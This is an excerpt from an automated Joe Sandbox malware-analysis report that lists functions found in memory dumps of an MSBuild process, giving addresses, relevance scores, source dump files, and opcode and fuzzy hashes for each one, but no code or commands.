Instruction Fuzzy Hash: 6FD19174E00318CFDB14DFA5D954BADBBB2BF89304F6081AAD809AB355DB359A81CF50

Function 06788B00 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a3cd2f5d0ac12cace7617668597e5797c8644e7bf7bcaeb0fd32bbec726bcc
Instruction ID: 50ffcd527e9ee79abd22d09fdda03e6e7b6593393ec700650be9896f53262d9c
Opcode Fuzzy Hash: 25a3cd2f5d0ac12cace7617668597e5797c8644e7bf7bcaeb0fd32bbec726bcc
Instruction Fuzzy Hash: 8FB146B0E45258CFDB55EFA5C488AADFFB2BF89300F6480AAC409AB255DB305D42DF51

Function 0678EE0F Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f487e6c3ec2e681a46a6c908f408c92c8895b9b120839a5e9f78bd5c92e7f8c4
Instruction ID: f8f3977bbce01c45d3e36dba74ee35e8bc19177ea4e3c13a7527e9ffbe3c196f
Opcode Fuzzy Hash: f487e6c3ec2e681a46a6c908f408c92c8895b9b120839a5e9f78bd5c92e7f8c4
Instruction Fuzzy Hash: B8B1C574A40219CFDB65EF25C988BE9BBB2BB48300F1081E9D559A7365DB309EC1CF40

Function 0678D218 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b4311f795e68e9d995fde627522a0c386eda9c22795db6a2cc465f77af02b0
Instruction ID: 8f05717bf5610d7447030935d0b8d9289a326cba780ce0f6ef9d00ba09b41b18
Opcode Fuzzy Hash: d1b4311f795e68e9d995fde627522a0c386eda9c22795db6a2cc465f77af02b0
Instruction Fuzzy Hash: 84A191B5E01218CFEB68DF6AC944B9DBBF2AF89300F14C0AAD40DA7255DB305A85CF50

Function 0678B290 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a56221d3194192bcd83a341e4037bf6f226763ffb78aa25811c661d9cec6da
Instruction ID: 11e97fc831610f025b4e2b13b8aa6763151ff7f4c4a59ba010adc043213a95a0
Opcode Fuzzy Hash: b4a56221d3194192bcd83a341e4037bf6f226763ffb78aa25811c661d9cec6da
Instruction Fuzzy Hash: C3A19F75E01228CFEB68DF6AC944B9DFAF2AF89300F14C0AAD40DA7255DB305A85CF50

Function 0678BF30 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd2a1b20f2ecff27136b9a3d51aba89dc425fee00ca6aaee436d71e832e44e4
Instruction ID: 4942e6fe2fd79f8a8476a74dc5dc9347b80c9acf7ba8ba9db84c5027e90614f3
Opcode Fuzzy Hash: 1dd2a1b20f2ecff27136b9a3d51aba89dc425fee00ca6aaee436d71e832e44e4
Instruction Fuzzy Hash: 4AA1A2B5E012188FEB68DF6AC944B9DBBF2AF89300F14C0AAD50DA7255DB305A85CF50

Function 06789FB0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bff7063333d8008c0d37c73cae21d6efcb451a2ef84f15068dc84c17f42347a
Instruction ID: 78adb002155499d8fcacf5b8d2e9e072a233439621c73a3e886745f05660600d
Opcode Fuzzy Hash: 8bff7063333d8008c0d37c73cae21d6efcb451a2ef84f15068dc84c17f42347a
Instruction Fuzzy Hash: 89A1A275E412188FEB68DF6AC944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF50

Function 0678B8E0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dee5ff5febc997fe66e4c3a161824c857c79a1bcedbb11ed6005694745634bf
Instruction ID: 9df74bef9e9d09b5f5803756146619d079353202aa9c32c0fabe0082780b205a
Opcode Fuzzy Hash: 1dee5ff5febc997fe66e4c3a161824c857c79a1bcedbb11ed6005694745634bf
Instruction Fuzzy Hash: CDA19F74E41228CFEB68DF6AC944B9DBBF2AF89300F14C1AAD40CA7255DB305A85CF51

Function 0678C580 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b460338a227082776dceea5a27e79781796194f78d69de50228b3ba09868c1
Instruction ID: ba539370d6bae70ebb61976ea331968e935cc379ed7496845102b22ada29714c
Opcode Fuzzy Hash: f5b460338a227082776dceea5a27e79781796194f78d69de50228b3ba09868c1
Instruction Fuzzy Hash: 6BA1A275E01218CFEB68DF6AD944B9DBBF2AF89300F14C0AAD40DA7255DB305A85CF50

Function 0678A600 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5096d49f0d61073686c0e6648fb2e6d0f0b56675caa56edf5ad036779d3c138b
Instruction ID: 966476e513c19d266133940eff2ee82fd2dff49cd5d2d6fafbf1dad29f726b6c
Opcode Fuzzy Hash: 5096d49f0d61073686c0e6648fb2e6d0f0b56675caa56edf5ad036779d3c138b
Instruction Fuzzy Hash: ADA19175E012288FEB68DF6AC944B9DFBF2AF89300F14C1AAD40DA7255DB345A85CF50

Function 0678CBD0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45b6565e00e2b910175ddc17a42a10f07378ea94b58d1eaaea6c09c7579b870
Instruction ID: 37de25ffecb873009f3fe015c8a670e24bfea91f8bdcb09b9a1ad79db9595fad
Opcode Fuzzy Hash: b45b6565e00e2b910175ddc17a42a10f07378ea94b58d1eaaea6c09c7579b870
Instruction Fuzzy Hash: A5A1A275E012188FEB68DF6AC944B9DFBF2AF89300F14C0AAD50DA7255DB305A85CF60

Function 0678AC48 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d2fc6e91492927ab06c02a9af1a9f14c1ce733a83109f1865b73e8ca05a6977
Instruction ID: abed26683308aceb07327197ea129216ed29c59c947eff586659dfca04e75b58
Opcode Fuzzy Hash: 8d2fc6e91492927ab06c02a9af1a9f14c1ce733a83109f1865b73e8ca05a6977
Instruction Fuzzy Hash: DDA192B5E012188FEB68DF6AC944B9DFBF2AF89300F14C1AAD40DA7255DB345A85CF50

Function 02B1C752 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33cf697d18926121ff00c780b6badce4abb7f69311ca97eaa0a22ff3a615d7b
Instruction ID: 0bc57139e25501302454700a8e2da44e95b3b4449138a5b54bc358c9e8bdb98f
Opcode Fuzzy Hash: f33cf697d18926121ff00c780b6badce4abb7f69311ca97eaa0a22ff3a615d7b
Instruction Fuzzy Hash: 5A81B374E40218DFDB14DFA9D884BADBBF2BF89300F1480AAD549AB355DB309942CF11

Function 02B1BBB8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8172d635bfa054764d889866a77303a126b1472317943a4f967da7611cae74b9
Instruction ID: e1f90084a763dd88fcdb79db90394729d53f99b01697a84109b150d0a9814702
Opcode Fuzzy Hash: 8172d635bfa054764d889866a77303a126b1472317943a4f967da7611cae74b9
Instruction Fuzzy Hash: 4791B574E00258DFEB18DFA9D884A9DBBF2FF89304F5480A9D449AB365DB309946CF50

Function 02B1BEB0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d01d5c2dd79645208dcf17ea2b26ed9973a7335fdc09acaa6d82d6478d2f6b0
Instruction ID: a8be32b931425859fb25b3d3de284979cdaf861fcd25338eb7e1f5d51e66f666
Opcode Fuzzy Hash: 5d01d5c2dd79645208dcf17ea2b26ed9973a7335fdc09acaa6d82d6478d2f6b0
Instruction Fuzzy Hash: 8881B374E40218DFEB14DFA9D884A9DBBF2FF88300F5480AAE409AB355DB319985CF51

Function 0678AC37 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11e1eadef633d91ab16e33ae0a85c82ad8760611e091d8359ccd0a26a17f8c7d
Instruction ID: 29910867483b01d7eeb070f266d28ced3263cde95a7c0359a4d7c36ca623176b
Opcode Fuzzy Hash: 11e1eadef633d91ab16e33ae0a85c82ad8760611e091d8359ccd0a26a17f8c7d
Instruction Fuzzy Hash: 0491D6B1D012588FEB68CF6AC944B99BBB2BF89300F14C0EAD40DAB255DB315E85CF51

Function 02B1C190 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da08d35aa12581e2a4607bc7d51612915263ce4125c0fde1ecf1fd45a112fb99
Instruction ID: 80ccb4bde48446eaa4572733fc60c5fdd594299445a586b2edb9a56686c38be4
Opcode Fuzzy Hash: da08d35aa12581e2a4607bc7d51612915263ce4125c0fde1ecf1fd45a112fb99
Instruction Fuzzy Hash: 53819274E402189FDB14DFAAD884A9DBBF2FF89300F14C0AAD459AB365DB309942CF55

Function 02B14AD9 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400f70108903f293eeca40428bedd188bd508df5056ce8999d96356301a1c6e6
Instruction ID: 7958a36d081ba9a03eabd3684a75c2b7266b182e0db2a20fe3720b4c845fa4df
Opcode Fuzzy Hash: 400f70108903f293eeca40428bedd188bd508df5056ce8999d96356301a1c6e6
Instruction Fuzzy Hash: DD819474E00218DFEB54DFA9D984A9DBBF2FF88300F5480A9E819AB365DB309945CF50

Function 02B1CA32 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22e823fd1be327f1e34c3fff432bcd18ed2a6619f4ab3f453697c9746eb669a0
Instruction ID: 1659e61c2f1c26bd986c640bae5940c17504ede1ace5f5a66aab3f506a391400
Opcode Fuzzy Hash: 22e823fd1be327f1e34c3fff432bcd18ed2a6619f4ab3f453697c9746eb669a0
Instruction Fuzzy Hash: F4819574E00218DFEB14DFA9D984A9DBBF2FF88300F5490AAD419AB365DB309946CF51

Function 02B1C473 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c8c2d6979b93e7f944e503791ef8e81d4b248ff39d7fc06e96410a7ea5d5d2
Instruction ID: d3e5c960643b939d976d06a800fd8cfc5480a5316f4c3560bfc502156286c425
Opcode Fuzzy Hash: 10c8c2d6979b93e7f944e503791ef8e81d4b248ff39d7fc06e96410a7ea5d5d2
Instruction Fuzzy Hash: 6D819474E40218DFDB14DFA9D984AADBBF2FF88300F5490AAD409AB365DB309946CF11

Function 06780D39 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 222da74e632d8b19efb5815ba6d7dd0de11018ea3f5e9f330c3049257cddf823
Instruction ID: 9aa327f4208560e0b011f33e884eeb420c8372055655bc7e71811a4ad9e108df
Opcode Fuzzy Hash: 222da74e632d8b19efb5815ba6d7dd0de11018ea3f5e9f330c3049257cddf823
Instruction Fuzzy Hash: 4E819274E412699FEB64EF25D855BEDBBB1BF89300F1080EAD809A7254DB305E81CF44

Function 0678CBC0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b220b2aba236866cd800ad575e68324d5027b359eb1b73c9da3c3a186dcb0d0c
Instruction ID: eb5385f6180f2ea308fa29892f88d248c35b0b06054464a45c2593d81b6f38d1
Opcode Fuzzy Hash: b220b2aba236866cd800ad575e68324d5027b359eb1b73c9da3c3a186dcb0d0c
Instruction Fuzzy Hash: 6B7185B5E41618CFEB68DF6AC944B9DFAF2AF89300F14C0AAD50DA7254DB344A85CF50

Function 0678A5F0 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dabc395359b9ff6c1e5a58acf83c5e4829afdba5205c6d662cf85cdc70cb947
Instruction ID: 59fb95c2fd03881305ff53ac266bbda1f35bbeb87e83c7c8eb8071ff8bbaca33
Opcode Fuzzy Hash: 4dabc395359b9ff6c1e5a58acf83c5e4829afdba5205c6d662cf85cdc70cb947
Instruction Fuzzy Hash: 6171A3B1E016188FEB68DF6AC944B9DFBF2AF89300F14C1AAD50DA7254DB345A85CF50

Function 02B1B4F2 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c2ffed1dcad19873068fd1d6dc3147298671f3a484973135b0c28bbb1d96ec
Instruction ID: 9cafa461b34e5330db3c22ef701337a81530c203536e295be0f3eacd910fe198
Opcode Fuzzy Hash: 11c2ffed1dcad19873068fd1d6dc3147298671f3a484973135b0c28bbb1d96ec
Instruction Fuzzy Hash: 6F61C474E006089FEB18DFAAD984A9DFBF2FF88304F148169D419AB365DB309942CF50

Function 067885A0 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6955fa16e893a875bde8887ec794fca48eb6f3fa82f1885289470b06e0cd522f
Instruction ID: f228a80bd6a8e4bdb53878dcae6d13069421cdd8baeef18bd9e1c8fdda40bba6
Opcode Fuzzy Hash: 6955fa16e893a875bde8887ec794fca48eb6f3fa82f1885289470b06e0cd522f
Instruction Fuzzy Hash: 4A51E0B0D00208CFEB58DFAAC9447AEBBF6BF88300F54C16AC419AB254DB754986CF55

Function 0678BF20 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 760d9c808dc9121c33d993abd5856772f2348ea4d33d6853e74a2da049d49c27
Instruction ID: 1599492839936c4d6e14c971fffced9b074193c538c05d13353c77608da53b3d
Opcode Fuzzy Hash: 760d9c808dc9121c33d993abd5856772f2348ea4d33d6853e74a2da049d49c27
Instruction Fuzzy Hash: AF5186B5E016588FEB58CF6BC94579AFBF3AFC9200F14C0AAC50CA6255DB740A86CF54

Function 0678C570 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9044e5473adbc514bec0fd37486ae3fcb8a96e2d0d96a45e4c6ab5f7ab440f26
Instruction ID: c96033c0072f6cb3beeb9b7530e273f532304c83ff741f21f9efb9d624247a5b
Opcode Fuzzy Hash: 9044e5473adbc514bec0fd37486ae3fcb8a96e2d0d96a45e4c6ab5f7ab440f26
Instruction Fuzzy Hash: B15175B1E016188FEB58DF6BD94579AFAF3AFC8210F14C1AAC50CA6254DB740A858F50

Function 0678D20B Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5831c68b9dc425f4aedbbc3a6f99a28c475463369fd55f51abcd9a8a9422e2b8
Instruction ID: 06f6a94057515898310157753cce9b56e963fee15b1f557e692de4e09d00b8cf
Opcode Fuzzy Hash: 5831c68b9dc425f4aedbbc3a6f99a28c475463369fd55f51abcd9a8a9422e2b8
Instruction Fuzzy Hash: D14158B1E016188FEB68DF6BD9457DAFAF3AFC8300F04C1AAC50CA6254DB740A858F55

Function 0678B8D0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20905d73a6dc0c0a872bd247d741f8888d85d51cad0c1515c483b16c1974fb15
Instruction ID: 52b9b18ffbd329a5ae63944219778181fd970e7fb581d24fee89aa0e83bfa24c
Opcode Fuzzy Hash: 20905d73a6dc0c0a872bd247d741f8888d85d51cad0c1515c483b16c1974fb15
Instruction Fuzzy Hash: 29417AB1E016188FEB58DF6BC945799FAF3AFC8300F14C1AAC50CA6264DB740986CF54

Function 06789FA0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78dd5bf409e45082e759c5ff27612229ed0ad1578c55a67cefcbd3c5570c8ca5
Instruction ID: 961003ccb48ae26dbb8fac7ae6e061e66340a583abd68f5230b1735032c4d1fc
Opcode Fuzzy Hash: 78dd5bf409e45082e759c5ff27612229ed0ad1578c55a67cefcbd3c5570c8ca5
Instruction Fuzzy Hash: 3B4145B5E016188FEB58CF6BC9457DAFAF3AFC8301F14C1AAC50CA6254EB741A858F51

Function 0678B281 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337c00776e6248d819df09818cc261f84835e33da8d513365e532ebe0a1d543b
Instruction ID: 5642a309534c46a5325705ee6d6f0200f0c176f2431a420fbf72fc4a020d29ce
Opcode Fuzzy Hash: 337c00776e6248d819df09818cc261f84835e33da8d513365e532ebe0a1d543b
Instruction Fuzzy Hash: 534135B1E016188BEB58DF6BC94579AFAF3AFC9310F14C1AAC50CA6264DB740A85CF50

Function 06757B8C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06757CCE

Memory Dump Source

Source File: 00000009.00000002.4707161162.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ec4e3b29100c7b679c85ec5608b7919271689afd966bcb20754e49f1b834b01
Instruction ID: c163e7df3ba45e3649d0a16ed75490d1d1746ffbfaff81d1365f8e8238c95194
Opcode Fuzzy Hash: 5ec4e3b29100c7b679c85ec5608b7919271689afd966bcb20754e49f1b834b01
Instruction Fuzzy Hash: 4E116D74E002099FEB48DFA8D884ABDB7FABB88314F25C295E904E7241DB719941CB50

Function 02B177F0 Relevance: .7, Instructions: 692
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f328d54d8cac11a59e225a5dbf20dc854c2be112d1bbc7ac347140ba21ceb6
Instruction ID: e3e8773ca11cd27074003a64dfb8682b3429c2a4658f82cbeff32203348d8036
Opcode Fuzzy Hash: 39f328d54d8cac11a59e225a5dbf20dc854c2be112d1bbc7ac347140ba21ceb6
Instruction Fuzzy Hash: A3525F34A00219CFFB15EBA4C860B9EBB76FF98700F1081A9C50A6B395CB359E85DF55

Function 02B187E9 Relevance: .5, Instructions: 497
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a7b09211ad8a528a95a6593ceee63c133e5c9cd147e9f117fa02969dfd73e20
Instruction ID: 522938ec11458beaf1ec66f4da035599b65e91e9783ec4d13ae582345667ac05
Opcode Fuzzy Hash: 6a7b09211ad8a528a95a6593ceee63c133e5c9cd147e9f117fa02969dfd73e20
Instruction Fuzzy Hash: 88F14B703146018FEB199A39C958B3A37A6FF86744F9944EAE502CF3A1EF25CC82C751

Function 02B16E58 Relevance: .5, Instructions: 494
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dcab532c7975878a2d2a76c75caff60c9c45838022d6a9855bdf012e14a278e
Instruction ID: 46a8802cf2dad02a393cdb03d3073922c8ddc4a716b48c55d3d179efc3db4bd7
Opcode Fuzzy Hash: 9dcab532c7975878a2d2a76c75caff60c9c45838022d6a9855bdf012e14a278e
Instruction Fuzzy Hash: EB222831A00209DFCB14DF69D884A9EBBF2EF89314F558599E949DB3A1DB30ED41CB90

Function 02B1A84F Relevance: .4, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b542a86ead8bd2d386e1ca3b69b7412e72999409564d6a3f8c3e1659f3f1b915
Instruction ID: b22fd89b0146f0261a339dbc37b674cf059dad4e3381852f56a6ca731d6d1e2f
Opcode Fuzzy Hash: b542a86ead8bd2d386e1ca3b69b7412e72999409564d6a3f8c3e1659f3f1b915
Instruction Fuzzy Hash: 57F12D71A012558FCB04CF68D984AAEBBF2FF88314B5A8099E515EB365CB35EC41CB50

Function 02B10C8F Relevance: .4, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202d3febdd8a668fe071bce34e9bdfb69c58bc76fe95f8e871fc8964f0abab73
Instruction ID: 505461ed503e982c2cc16b3a6826927437be4fcf06f736a82344a90e3bc0f2d6
Opcode Fuzzy Hash: 202d3febdd8a668fe071bce34e9bdfb69c58bc76fe95f8e871fc8964f0abab73
Instruction Fuzzy Hash: E722857490021ADFCB54EF64E889B9DBBB2BF48301F1185AAD549A7354DF306D86CF44

Function 02B10CA0 Relevance: .4, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d22f531f951adbc9f63ab5536edf0b4594b3c889c6185bb9d0fe2483e116db9
Instruction ID: 17084dfbe127346625066da70235e15c74ac9fe4496452d38cfc8ac49549b383
